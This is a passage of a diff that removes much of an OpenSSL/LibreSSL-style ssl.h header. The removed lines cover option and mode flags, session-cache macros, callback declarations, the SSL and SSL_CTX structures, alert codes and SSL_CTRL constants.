- * in OpenSSL 0.9.6d.  Usually (depending on the application protocol)
- * the workaround is not needed.
- * Unfortunately some broken SSL/TLS implementations cannot handle it
- * at all, which is why it was previously included in SSL_OP_ALL.
- * Now it's not.
- */
-#define SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS		0x00000800L
-
-/* DTLS options */
-#define SSL_OP_NO_QUERY_MTU				0x00001000L
-/* Turn on Cookie Exchange (on relevant for servers) */
-#define SSL_OP_COOKIE_EXCHANGE				0x00002000L
-/* Don't use RFC4507 ticket extension */
-#define SSL_OP_NO_TICKET				0x00004000L
-
-/* As server, disallow session resumption on renegotiation */
-#define SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION	0x00010000L
-/* Disallow client initiated renegotiation. */
-#define SSL_OP_NO_CLIENT_RENEGOTIATION			0x00020000L
-/* If set, always create a new key when using tmp_dh parameters */
-#define SSL_OP_SINGLE_DH_USE				0x00100000L
-/* Set on servers to choose the cipher according to the server's
- * preferences */
-#define SSL_OP_CIPHER_SERVER_PREFERENCE			0x00400000L
-/* If set, a server will allow a client to issue a SSLv3.0 version number
- * as latest version supported in the premaster secret, even when TLSv1.0
- * (version 3.1) was announced in the client hello. Normally this is
- * forbidden to prevent version rollback attacks. */
-#define SSL_OP_TLS_ROLLBACK_BUG				0x00800000L
-
-#define SSL_OP_NO_TLSv1					0x04000000L
-#define SSL_OP_NO_TLSv1_2				0x08000000L
-#define SSL_OP_NO_TLSv1_1				0x10000000L
-
-/* SSL_OP_ALL: various bug workarounds that should be rather harmless. */
-#define SSL_OP_ALL \
-    (SSL_OP_LEGACY_SERVER_CONNECT)
-
-/* Obsolete flags kept for compatibility. No sane code should use them. */
-#define SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION	0x0
-#define SSL_OP_CISCO_ANYCONNECT				0x0
-#define SSL_OP_CRYPTOPRO_TLSEXT_BUG			0x0
-#define SSL_OP_EPHEMERAL_RSA				0x0
-#define SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER		0x0
-#define SSL_OP_MICROSOFT_SESS_ID_BUG			0x0
-#define SSL_OP_MSIE_SSLV2_RSA_PADDING			0x0
-#define SSL_OP_NETSCAPE_CA_DN_BUG			0x0
-#define SSL_OP_NETSCAPE_CHALLENGE_BUG			0x0
-#define SSL_OP_NETSCAPE_DEMO_CIPHER_CHANGE_BUG		0x0
-#define SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG		0x0
-#define SSL_OP_NO_COMPRESSION				0x0
-#define SSL_OP_NO_SSLv2					0x0
-#define SSL_OP_NO_SSLv3					0x0
-#define SSL_OP_PKCS1_CHECK_1				0x0
-#define SSL_OP_PKCS1_CHECK_2				0x0
-#define SSL_OP_SAFARI_ECDHE_ECDSA_BUG			0x0
-#define SSL_OP_SINGLE_ECDH_USE				0x0
-#define SSL_OP_SSLEAY_080_CLIENT_DH_BUG			0x0
-#define SSL_OP_SSLREF2_REUSE_CERT_TYPE_BUG		0x0
-#define SSL_OP_TLSEXT_PADDING				0x0
-#define SSL_OP_TLS_BLOCK_PADDING_BUG			0x0
-#define SSL_OP_TLS_D5_BUG				0x0
-
-/* Allow SSL_write(..., n) to return r with 0 < r < n (i.e. report success
- * when just a single record has been written): */
-#define SSL_MODE_ENABLE_PARTIAL_WRITE       0x00000001L
-/* Make it possible to retry SSL_write() with changed buffer location
- * (buffer contents must stay the same!); this is not the default to avoid
- * the misconception that non-blocking SSL_write() behaves like
- * non-blocking write(): */
-#define SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER 0x00000002L
-/* Never bother the application with retries if the transport
- * is blocking: */
-#define SSL_MODE_AUTO_RETRY 0x00000004L
-/* Don't attempt to automatically build certificate chain */
-#define SSL_MODE_NO_AUTO_CHAIN 0x00000008L
-/* Save RAM by releasing read and write buffers when they're empty. (SSL3 and
- * TLS only.)  "Released" buffers are put onto a free-list in the context
- * or just freed (depending on the context's setting for freelist_max_len). */
-#define SSL_MODE_RELEASE_BUFFERS 0x00000010L
-
-/* Note: SSL[_CTX]_set_{options,mode} use |= op on the previous value,
- * they cannot be used to clear bits. */
-
-#define SSL_CTX_set_options(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_OPTIONS,(op),NULL)
-#define SSL_CTX_clear_options(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_OPTIONS,(op),NULL)
-#define SSL_CTX_get_options(ctx) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_OPTIONS,0,NULL)
-#define SSL_set_options(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_OPTIONS,(op),NULL)
-#define SSL_clear_options(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_CLEAR_OPTIONS,(op),NULL)
-#define SSL_get_options(ssl) \
-        SSL_ctrl((ssl),SSL_CTRL_OPTIONS,0,NULL)
-
-#define SSL_CTX_set_mode(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_MODE,(op),NULL)
-#define SSL_CTX_clear_mode(ctx,op) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_CLEAR_MODE,(op),NULL)
-#define SSL_CTX_get_mode(ctx) \
-	SSL_CTX_ctrl((ctx),SSL_CTRL_MODE,0,NULL)
-#define SSL_clear_mode(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_CLEAR_MODE,(op),NULL)
-#define SSL_set_mode(ssl,op) \
-	SSL_ctrl((ssl),SSL_CTRL_MODE,(op),NULL)
-#define SSL_get_mode(ssl) \
-        SSL_ctrl((ssl),SSL_CTRL_MODE,0,NULL)
-#define SSL_set_mtu(ssl, mtu) \
-        SSL_ctrl((ssl),SSL_CTRL_SET_MTU,(mtu),NULL)
-
-#define SSL_get_secure_renegotiation_support(ssl) \
-	SSL_ctrl((ssl), SSL_CTRL_GET_RI_SUPPORT, 0, NULL)
-
-void SSL_CTX_set_msg_callback(SSL_CTX *ctx, void (*cb)(int write_p,
-    int version, int content_type, const void *buf, size_t len, SSL *ssl,
-    void *arg));
-void SSL_set_msg_callback(SSL *ssl, void (*cb)(int write_p, int version,
-    int content_type, const void *buf, size_t len, SSL *ssl, void *arg));
-#define SSL_CTX_set_msg_callback_arg(ctx, arg) SSL_CTX_ctrl((ctx), SSL_CTRL_SET_MSG_CALLBACK_ARG, 0, (arg))
-#define SSL_set_msg_callback_arg(ssl, arg) SSL_ctrl((ssl), SSL_CTRL_SET_MSG_CALLBACK_ARG, 0, (arg))
-
-struct ssl_aead_ctx_st;
-typedef struct ssl_aead_ctx_st SSL_AEAD_CTX;
-
-#define SSL_MAX_CERT_LIST_DEFAULT 1024*100 /* 100k max cert list :-) */
-
-#define SSL_SESSION_CACHE_MAX_SIZE_DEFAULT	(1024*20)
-
-/* This callback type is used inside SSL_CTX, SSL, and in the functions that set
- * them. It is used to override the generation of SSL/TLS session IDs in a
- * server. Return value should be zero on an error, non-zero to proceed. Also,
- * callbacks should themselves check if the id they generate is unique otherwise
- * the SSL handshake will fail with an error - callbacks can do this using the
- * 'ssl' value they're passed by;
- *      SSL_has_matching_session_id(ssl, id, *id_len)
- * The length value passed in is set at the maximum size the session ID can be.
- * In SSLv2 this is 16 bytes, whereas SSLv3/TLSv1 it is 32 bytes. The callback
- * can alter this length to be less if desired, but under SSLv2 session IDs are
- * supposed to be fixed at 16 bytes so the id will be padded after the callback
- * returns in this case. It is also an error for the callback to set the size to
- * zero. */
-typedef int (*GEN_SESSION_CB)(const SSL *ssl, unsigned char *id,
-    unsigned int *id_len);
-
-typedef struct ssl_comp_st SSL_COMP;
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-struct ssl_comp_st {
-	int id;
-	const char *name;
-};
-
-DECLARE_STACK_OF(SSL_COMP)
-struct lhash_st_SSL_SESSION {
-	int dummy;
-};
-
-struct ssl_ctx_internal_st;
-
-struct ssl_ctx_st {
-	const SSL_METHOD *method;
-
-	STACK_OF(SSL_CIPHER) *cipher_list;
-
-	struct x509_store_st /* X509_STORE */ *cert_store;
-
-	/* If timeout is not 0, it is the default timeout value set
-	 * when SSL_new() is called.  This has been put in to make
-	 * life easier to set things up */
-	long session_timeout;
-
-	int references;
-
-	/* Default values to use in SSL structures follow (these are copied by SSL_new) */
-
-	STACK_OF(X509) *extra_certs;
-
-	int verify_mode;
-	unsigned int sid_ctx_length;
-	unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
-
-	X509_VERIFY_PARAM *param;
-
-	/*
-	 * XXX
-	 * default_passwd_cb used by python and openvpn, need to keep it until we
-	 * add an accessor
-	 */
-	/* Default password callback. */
-	pem_password_cb *default_passwd_callback;
-
-	/* Default password callback user data. */
-	void *default_passwd_callback_userdata;
-
-	struct ssl_ctx_internal_st *internal;
-};
-
-#endif
-
-#define SSL_SESS_CACHE_OFF			0x0000
-#define SSL_SESS_CACHE_CLIENT			0x0001
-#define SSL_SESS_CACHE_SERVER			0x0002
-#define SSL_SESS_CACHE_BOTH	(SSL_SESS_CACHE_CLIENT|SSL_SESS_CACHE_SERVER)
-#define SSL_SESS_CACHE_NO_AUTO_CLEAR		0x0080
-/* enough comments already ... see SSL_CTX_set_session_cache_mode(3) */
-#define SSL_SESS_CACHE_NO_INTERNAL_LOOKUP	0x0100
-#define SSL_SESS_CACHE_NO_INTERNAL_STORE	0x0200
-#define SSL_SESS_CACHE_NO_INTERNAL \
-	(SSL_SESS_CACHE_NO_INTERNAL_LOOKUP|SSL_SESS_CACHE_NO_INTERNAL_STORE)
-
-struct lhash_st_SSL_SESSION *SSL_CTX_sessions(SSL_CTX *ctx);
-#define SSL_CTX_sess_number(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_NUMBER,0,NULL)
-#define SSL_CTX_sess_connect(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT,0,NULL)
-#define SSL_CTX_sess_connect_good(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT_GOOD,0,NULL)
-#define SSL_CTX_sess_connect_renegotiate(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CONNECT_RENEGOTIATE,0,NULL)
-#define SSL_CTX_sess_accept(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT,0,NULL)
-#define SSL_CTX_sess_accept_renegotiate(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT_RENEGOTIATE,0,NULL)
-#define SSL_CTX_sess_accept_good(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_ACCEPT_GOOD,0,NULL)
-#define SSL_CTX_sess_hits(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_HIT,0,NULL)
-#define SSL_CTX_sess_cb_hits(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CB_HIT,0,NULL)
-#define SSL_CTX_sess_misses(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_MISSES,0,NULL)
-#define SSL_CTX_sess_timeouts(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_TIMEOUTS,0,NULL)
-#define SSL_CTX_sess_cache_full(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SESS_CACHE_FULL,0,NULL)
-
-void SSL_CTX_sess_set_new_cb(SSL_CTX *ctx,
-    int (*new_session_cb)(struct ssl_st *ssl, SSL_SESSION *sess));
-int (*SSL_CTX_sess_get_new_cb(SSL_CTX *ctx))(struct ssl_st *ssl,
-    SSL_SESSION *sess);
-void SSL_CTX_sess_set_remove_cb(SSL_CTX *ctx,
-    void (*remove_session_cb)(struct ssl_ctx_st *ctx, SSL_SESSION *sess));
-void (*SSL_CTX_sess_get_remove_cb(SSL_CTX *ctx))(struct ssl_ctx_st *ctx,
-    SSL_SESSION *sess);
-void SSL_CTX_sess_set_get_cb(SSL_CTX *ctx,
-    SSL_SESSION *(*get_session_cb)(struct ssl_st *ssl, unsigned char *data,
-    int len, int *copy));
-SSL_SESSION *(*SSL_CTX_sess_get_get_cb(SSL_CTX *ctx))(struct ssl_st *ssl,
-    unsigned char *Data, int len, int *copy);
-void SSL_CTX_set_info_callback(SSL_CTX *ctx, void (*cb)(const SSL *ssl,
-    int type, int val));
-void (*SSL_CTX_get_info_callback(SSL_CTX *ctx))(const SSL *ssl, int type,
-    int val);
-void SSL_CTX_set_client_cert_cb(SSL_CTX *ctx,
-    int (*client_cert_cb)(SSL *ssl, X509 **x509, EVP_PKEY **pkey));
-int (*SSL_CTX_get_client_cert_cb(SSL_CTX *ctx))(SSL *ssl, X509 **x509,
-    EVP_PKEY **pkey);
-#ifndef OPENSSL_NO_ENGINE
-int SSL_CTX_set_client_cert_engine(SSL_CTX *ctx, ENGINE *e);
-#endif
-void SSL_CTX_set_cookie_generate_cb(SSL_CTX *ctx,
-    int (*app_gen_cookie_cb)(SSL *ssl, unsigned char *cookie,
-    unsigned int *cookie_len));
-void SSL_CTX_set_cookie_verify_cb(SSL_CTX *ctx,
-    int (*app_verify_cookie_cb)(SSL *ssl, unsigned char *cookie,
-    unsigned int cookie_len));
-void SSL_CTX_set_next_protos_advertised_cb(SSL_CTX *s, int (*cb)(SSL *ssl,
-    const unsigned char **out, unsigned int *outlen, void *arg), void *arg);
-void SSL_CTX_set_next_proto_select_cb(SSL_CTX *s, int (*cb)(SSL *ssl,
-    unsigned char **out, unsigned char *outlen, const unsigned char *in,
-    unsigned int inlen, void *arg), void *arg);
-
-int SSL_select_next_proto(unsigned char **out, unsigned char *outlen,
-    const unsigned char *in, unsigned int inlen, const unsigned char *client,
-    unsigned int client_len);
-void SSL_get0_next_proto_negotiated(const SSL *s, const unsigned char **data,
-    unsigned *len);
-
-#define OPENSSL_NPN_UNSUPPORTED	0
-#define OPENSSL_NPN_NEGOTIATED	1
-#define OPENSSL_NPN_NO_OVERLAP	2
-
-int SSL_CTX_set_alpn_protos(SSL_CTX *ctx, const unsigned char *protos,
-    unsigned int protos_len);
-int SSL_set_alpn_protos(SSL *ssl, const unsigned char *protos,
-    unsigned int protos_len);
-void SSL_CTX_set_alpn_select_cb(SSL_CTX *ctx,
-    int (*cb)(SSL *ssl, const unsigned char **out, unsigned char *outlen,
-    const unsigned char *in, unsigned int inlen, void *arg), void *arg);
-void SSL_get0_alpn_selected(const SSL *ssl, const unsigned char **data,
-    unsigned int *len);
-
-#define SSL_NOTHING	1
-#define SSL_WRITING	2
-#define SSL_READING	3
-#define SSL_X509_LOOKUP	4
-
-/* These will only be used when doing non-blocking IO */
-#define SSL_want_nothing(s)	(SSL_want(s) == SSL_NOTHING)
-#define SSL_want_read(s)	(SSL_want(s) == SSL_READING)
-#define SSL_want_write(s)	(SSL_want(s) == SSL_WRITING)
-#define SSL_want_x509_lookup(s)	(SSL_want(s) == SSL_X509_LOOKUP)
-
-#define SSL_MAC_FLAG_READ_MAC_STREAM 1
-#define SSL_MAC_FLAG_WRITE_MAC_STREAM 2
-
-#ifndef OPENSSL_NO_SSL_INTERN
-struct ssl_internal_st;
-
-struct ssl_st {
-	/* protocol version
-	 * (one of SSL2_VERSION, SSL3_VERSION, TLS1_VERSION, DTLS1_VERSION)
-	 */
-	int version;
-
-	const SSL_METHOD *method; /* SSLv3 */
-
-	/* There are 2 BIO's even though they are normally both the
-	 * same.  This is so data can be read and written to different
-	 * handlers */
-
-	BIO *rbio; /* used by SSL_read */
-	BIO *wbio; /* used by SSL_write */
-	BIO *bbio; /* used during session-id reuse to concatenate
-		    * messages */
-	int server;	/* are we the server side? - mostly used by SSL_clear*/
-
-	struct ssl3_state_st *s3; /* SSLv3 variables */
-	struct dtls1_state_st *d1; /* DTLSv1 variables */
-
-	X509_VERIFY_PARAM *param;
-
-	/* crypto */
-	STACK_OF(SSL_CIPHER) *cipher_list;
-
-	/* This is used to hold the server certificate used */
-	struct cert_st /* CERT */ *cert;
-
-	/* the session_id_context is used to ensure sessions are only reused
-	 * in the appropriate context */
-	unsigned int sid_ctx_length;
-	unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
-
-	/* This can also be in the session once a session is established */
-	SSL_SESSION *session;
-
-	/* Used in SSL2 and SSL3 */
-	int verify_mode;	/* 0 don't care about verify failure.
-				 * 1 fail if verify fails */
-	int error;		/* error bytes to be written */
-	int error_code;		/* actual code */
-
-	SSL_CTX *ctx;
-
-	long verify_result;
-
-	int references;
-
-	int client_version;	/* what was passed, used for
-				 * SSLv3/TLS rollback check */
-
-	unsigned int max_send_fragment;
-
-	char *tlsext_hostname;
-
-	/* certificate status request info */
-	/* Status type or -1 if no status type */
-	int tlsext_status_type;
-
-	SSL_CTX * initial_ctx; /* initial ctx, used to store sessions */
-#define session_ctx initial_ctx
-
-	/*
-	 * XXX really should be internal, but is
-	 * touched unnaturally by wpa-supplicant
-	 * and freeradius and other perversions
-	 */
-	EVP_CIPHER_CTX *enc_read_ctx;		/* cryptographic state */
-	EVP_MD_CTX *read_hash;			/* used for mac generation */
-
-	struct ssl_internal_st *internal;
-};
-
-#endif
-
-#ifdef __cplusplus
-}
-#endif
-
-#include <openssl/ssl2.h>
-#include <openssl/ssl3.h>
-#include <openssl/tls1.h>	/* This is mostly sslv3 with a few tweaks */
-#include <openssl/dtls1.h>	/* Datagram TLS */
-#include <openssl/ssl23.h>
-#include <openssl/srtp.h>	/* Support for the use_srtp extension */
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* compatibility */
-#define SSL_set_app_data(s,arg)		(SSL_set_ex_data(s,0,(char *)arg))
-#define SSL_get_app_data(s)		(SSL_get_ex_data(s,0))
-#define SSL_SESSION_set_app_data(s,a)	(SSL_SESSION_set_ex_data(s,0,(char *)a))
-#define SSL_SESSION_get_app_data(s)	(SSL_SESSION_get_ex_data(s,0))
-#define SSL_CTX_get_app_data(ctx)	(SSL_CTX_get_ex_data(ctx,0))
-#define SSL_CTX_set_app_data(ctx,arg)	(SSL_CTX_set_ex_data(ctx,0,(char *)arg))
-
-/* The following are the possible values for ssl->state are are
- * used to indicate where we are up to in the SSL connection establishment.
- * The macros that follow are about the only things you should need to use
- * and even then, only when using non-blocking IO.
- * It can also be useful to work out where you were when the connection
- * failed */
-
-#define SSL_ST_CONNECT			0x1000
-#define SSL_ST_ACCEPT			0x2000
-#define SSL_ST_MASK			0x0FFF
-#define SSL_ST_INIT			(SSL_ST_CONNECT|SSL_ST_ACCEPT)
-#define SSL_ST_BEFORE			0x4000
-#define SSL_ST_OK			0x03
-#define SSL_ST_RENEGOTIATE		(0x04|SSL_ST_INIT)
-
-#define SSL_CB_LOOP			0x01
-#define SSL_CB_EXIT			0x02
-#define SSL_CB_READ			0x04
-#define SSL_CB_WRITE			0x08
-#define SSL_CB_ALERT			0x4000 /* used in callback */
-#define SSL_CB_READ_ALERT		(SSL_CB_ALERT|SSL_CB_READ)
-#define SSL_CB_WRITE_ALERT		(SSL_CB_ALERT|SSL_CB_WRITE)
-#define SSL_CB_ACCEPT_LOOP		(SSL_ST_ACCEPT|SSL_CB_LOOP)
-#define SSL_CB_ACCEPT_EXIT		(SSL_ST_ACCEPT|SSL_CB_EXIT)
-#define SSL_CB_CONNECT_LOOP		(SSL_ST_CONNECT|SSL_CB_LOOP)
-#define SSL_CB_CONNECT_EXIT		(SSL_ST_CONNECT|SSL_CB_EXIT)
-#define SSL_CB_HANDSHAKE_START		0x10
-#define SSL_CB_HANDSHAKE_DONE		0x20
-
-/* Is the SSL_connection established? */
-#define SSL_get_state(a)		(SSL_state((a)))
-#define SSL_is_init_finished(a)		(SSL_state((a)) == SSL_ST_OK)
-#define SSL_in_init(a)			(SSL_state((a))&SSL_ST_INIT)
-#define SSL_in_before(a)		(SSL_state((a))&SSL_ST_BEFORE)
-#define SSL_in_connect_init(a)		(SSL_state((a))&SSL_ST_CONNECT)
-#define SSL_in_accept_init(a)		(SSL_state((a))&SSL_ST_ACCEPT)
-
-/* The following 2 states are kept in ssl->rstate when reads fail,
- * you should not need these */
-#define SSL_ST_READ_HEADER		0xF0
-#define SSL_ST_READ_BODY		0xF1
-#define SSL_ST_READ_DONE		0xF2
-
-/* Obtain latest Finished message
- *   -- that we sent (SSL_get_finished)
- *   -- that we expected from peer (SSL_get_peer_finished).
- * Returns length (0 == no Finished so far), copies up to 'count' bytes. */
-size_t SSL_get_finished(const SSL *s, void *buf, size_t count);
-size_t SSL_get_peer_finished(const SSL *s, void *buf, size_t count);
-
-/* use either SSL_VERIFY_NONE or SSL_VERIFY_PEER, the last 2 options
- * are 'ored' with SSL_VERIFY_PEER if they are desired */
-#define SSL_VERIFY_NONE			0x00
-#define SSL_VERIFY_PEER			0x01
-#define SSL_VERIFY_FAIL_IF_NO_PEER_CERT	0x02
-#define SSL_VERIFY_CLIENT_ONCE		0x04
-
-#define OpenSSL_add_ssl_algorithms()	SSL_library_init()
-#define SSLeay_add_ssl_algorithms()	SSL_library_init()
-
-/* More backward compatibility */
-#define SSL_get_cipher(s) \
-		SSL_CIPHER_get_name(SSL_get_current_cipher(s))
-#define SSL_get_cipher_bits(s,np) \
-		SSL_CIPHER_get_bits(SSL_get_current_cipher(s),np)
-#define SSL_get_cipher_version(s) \
-		SSL_CIPHER_get_version(SSL_get_current_cipher(s))
-#define SSL_get_cipher_name(s) \
-		SSL_CIPHER_get_name(SSL_get_current_cipher(s))
-#define SSL_get_time(a)		SSL_SESSION_get_time(a)
-#define SSL_set_time(a,b)	SSL_SESSION_set_time((a),(b))
-#define SSL_get_timeout(a)	SSL_SESSION_get_timeout(a)
-#define SSL_set_timeout(a,b)	SSL_SESSION_set_timeout((a),(b))
-
-#define d2i_SSL_SESSION_bio(bp,s_id) ASN1_d2i_bio_of(SSL_SESSION,SSL_SESSION_new,d2i_SSL_SESSION,bp,s_id)
-#define i2d_SSL_SESSION_bio(bp,s_id) ASN1_i2d_bio_of(SSL_SESSION,i2d_SSL_SESSION,bp,s_id)
-
-SSL_SESSION *PEM_read_bio_SSL_SESSION(BIO *bp, SSL_SESSION **x,
-    pem_password_cb *cb, void *u);
-SSL_SESSION *PEM_read_SSL_SESSION(FILE *fp, SSL_SESSION **x,
-    pem_password_cb *cb, void *u);
-int PEM_write_bio_SSL_SESSION(BIO *bp, SSL_SESSION *x);
-int PEM_write_SSL_SESSION(FILE *fp, SSL_SESSION *x);
-
-#define SSL_AD_REASON_OFFSET		1000 /* offset to get SSL_R_... value from SSL_AD_... */
-
-/* These alert types are for SSLv3 and TLSv1 */
-#define SSL_AD_CLOSE_NOTIFY		SSL3_AD_CLOSE_NOTIFY
-#define SSL_AD_UNEXPECTED_MESSAGE	SSL3_AD_UNEXPECTED_MESSAGE /* fatal */
-#define SSL_AD_BAD_RECORD_MAC		SSL3_AD_BAD_RECORD_MAC     /* fatal */
-#define SSL_AD_DECRYPTION_FAILED	TLS1_AD_DECRYPTION_FAILED
-#define SSL_AD_RECORD_OVERFLOW		TLS1_AD_RECORD_OVERFLOW
-#define SSL_AD_DECOMPRESSION_FAILURE	SSL3_AD_DECOMPRESSION_FAILURE/* fatal */
-#define SSL_AD_HANDSHAKE_FAILURE	SSL3_AD_HANDSHAKE_FAILURE/* fatal */
-#define SSL_AD_NO_CERTIFICATE		SSL3_AD_NO_CERTIFICATE /* Not for TLS */
-#define SSL_AD_BAD_CERTIFICATE		SSL3_AD_BAD_CERTIFICATE
-#define SSL_AD_UNSUPPORTED_CERTIFICATE	SSL3_AD_UNSUPPORTED_CERTIFICATE
-#define SSL_AD_CERTIFICATE_REVOKED	SSL3_AD_CERTIFICATE_REVOKED
-#define SSL_AD_CERTIFICATE_EXPIRED	SSL3_AD_CERTIFICATE_EXPIRED
-#define SSL_AD_CERTIFICATE_UNKNOWN	SSL3_AD_CERTIFICATE_UNKNOWN
-#define SSL_AD_ILLEGAL_PARAMETER	SSL3_AD_ILLEGAL_PARAMETER   /* fatal */
-#define SSL_AD_UNKNOWN_CA		TLS1_AD_UNKNOWN_CA	/* fatal */
-#define SSL_AD_ACCESS_DENIED		TLS1_AD_ACCESS_DENIED	/* fatal */
-#define SSL_AD_DECODE_ERROR		TLS1_AD_DECODE_ERROR	/* fatal */
-#define SSL_AD_DECRYPT_ERROR		TLS1_AD_DECRYPT_ERROR
-#define SSL_AD_EXPORT_RESTRICTION	TLS1_AD_EXPORT_RESTRICTION/* fatal */
-#define SSL_AD_PROTOCOL_VERSION		TLS1_AD_PROTOCOL_VERSION /* fatal */
-#define SSL_AD_INSUFFICIENT_SECURITY	TLS1_AD_INSUFFICIENT_SECURITY/* fatal */
-#define SSL_AD_INTERNAL_ERROR		TLS1_AD_INTERNAL_ERROR	/* fatal */
-#define SSL_AD_INAPPROPRIATE_FALLBACK	TLS1_AD_INAPPROPRIATE_FALLBACK /* fatal */
-#define SSL_AD_USER_CANCELLED		TLS1_AD_USER_CANCELLED
-#define SSL_AD_NO_RENEGOTIATION		TLS1_AD_NO_RENEGOTIATION
-#define SSL_AD_UNSUPPORTED_EXTENSION	TLS1_AD_UNSUPPORTED_EXTENSION
-#define SSL_AD_CERTIFICATE_UNOBTAINABLE TLS1_AD_CERTIFICATE_UNOBTAINABLE
-#define SSL_AD_UNRECOGNIZED_NAME	TLS1_AD_UNRECOGNIZED_NAME
-#define SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE TLS1_AD_BAD_CERTIFICATE_STATUS_RESPONSE
-#define SSL_AD_BAD_CERTIFICATE_HASH_VALUE TLS1_AD_BAD_CERTIFICATE_HASH_VALUE
-#define SSL_AD_UNKNOWN_PSK_IDENTITY	TLS1_AD_UNKNOWN_PSK_IDENTITY /* fatal */
-
-#define SSL_ERROR_NONE			0
-#define SSL_ERROR_SSL			1
-#define SSL_ERROR_WANT_READ		2
-#define SSL_ERROR_WANT_WRITE		3
-#define SSL_ERROR_WANT_X509_LOOKUP	4
-#define SSL_ERROR_SYSCALL		5 /* look at error stack/return value/errno */
-#define SSL_ERROR_ZERO_RETURN		6
-#define SSL_ERROR_WANT_CONNECT		7
-#define SSL_ERROR_WANT_ACCEPT		8
-
-#define SSL_CTRL_NEED_TMP_RSA			1
-#define SSL_CTRL_SET_TMP_RSA			2
-#define SSL_CTRL_SET_TMP_DH			3
-#define SSL_CTRL_SET_TMP_ECDH			4
-#define SSL_CTRL_SET_TMP_RSA_CB			5
-#define SSL_CTRL_SET_TMP_DH_CB			6
-#define SSL_CTRL_SET_TMP_ECDH_CB		7
-
-#define SSL_CTRL_GET_SESSION_REUSED		8
-#define SSL_CTRL_GET_CLIENT_CERT_REQUEST	9
-#define SSL_CTRL_GET_NUM_RENEGOTIATIONS		10
-#define SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS	11
-#define SSL_CTRL_GET_TOTAL_RENEGOTIATIONS	12
-#define SSL_CTRL_GET_FLAGS			13
-#define SSL_CTRL_EXTRA_CHAIN_CERT		14
-
-#define SSL_CTRL_SET_MSG_CALLBACK               15
-#define SSL_CTRL_SET_MSG_CALLBACK_ARG           16
-
-/* only applies to datagram connections */
-#define SSL_CTRL_SET_MTU                17
-/* Stats */
-#define SSL_CTRL_SESS_NUMBER			20
-#define SSL_CTRL_SESS_CONNECT			21
-#define SSL_CTRL_SESS_CONNECT_GOOD		22
-#define SSL_CTRL_SESS_CONNECT_RENEGOTIATE	23
-#define SSL_CTRL_SESS_ACCEPT			24
-#define SSL_CTRL_SESS_ACCEPT_GOOD		25
-#define SSL_CTRL_SESS_ACCEPT_RENEGOTIATE	26
-#define SSL_CTRL_SESS_HIT			27
-#define SSL_CTRL_SESS_CB_HIT			28
-#define SSL_CTRL_SESS_MISSES			29
-#define SSL_CTRL_SESS_TIMEOUTS			30
-#define SSL_CTRL_SESS_CACHE_FULL		31
-#define SSL_CTRL_OPTIONS			32
-#define SSL_CTRL_MODE				33
-
-#define SSL_CTRL_GET_READ_AHEAD			40
-#define SSL_CTRL_SET_READ_AHEAD			41
-#define SSL_CTRL_SET_SESS_CACHE_SIZE		42
-#define SSL_CTRL_GET_SESS_CACHE_SIZE		43
-#define SSL_CTRL_SET_SESS_CACHE_MODE		44
-#define SSL_CTRL_GET_SESS_CACHE_MODE		45
-
-#define SSL_CTRL_GET_MAX_CERT_LIST		50
-#define SSL_CTRL_SET_MAX_CERT_LIST		51
-
-#define SSL_CTRL_SET_MAX_SEND_FRAGMENT		52
-
-/* see tls1.h for macros based on these */
-#define SSL_CTRL_SET_TLSEXT_SERVERNAME_CB	53
-#define SSL_CTRL_SET_TLSEXT_SERVERNAME_ARG	54
-#define SSL_CTRL_SET_TLSEXT_HOSTNAME		55
-#define SSL_CTRL_SET_TLSEXT_DEBUG_CB		56
-#define SSL_CTRL_SET_TLSEXT_DEBUG_ARG		57
-#define SSL_CTRL_GET_TLSEXT_TICKET_KEYS		58
-#define SSL_CTRL_SET_TLSEXT_TICKET_KEYS		59
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB	63
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_CB_ARG	64
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE	65
-#define SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS	66
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS	67
-#define SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS	68
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS	69
-#define SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP	70
-#define SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP	71
-
-#define SSL_CTRL_SET_TLSEXT_TICKET_KEY_CB	72
-
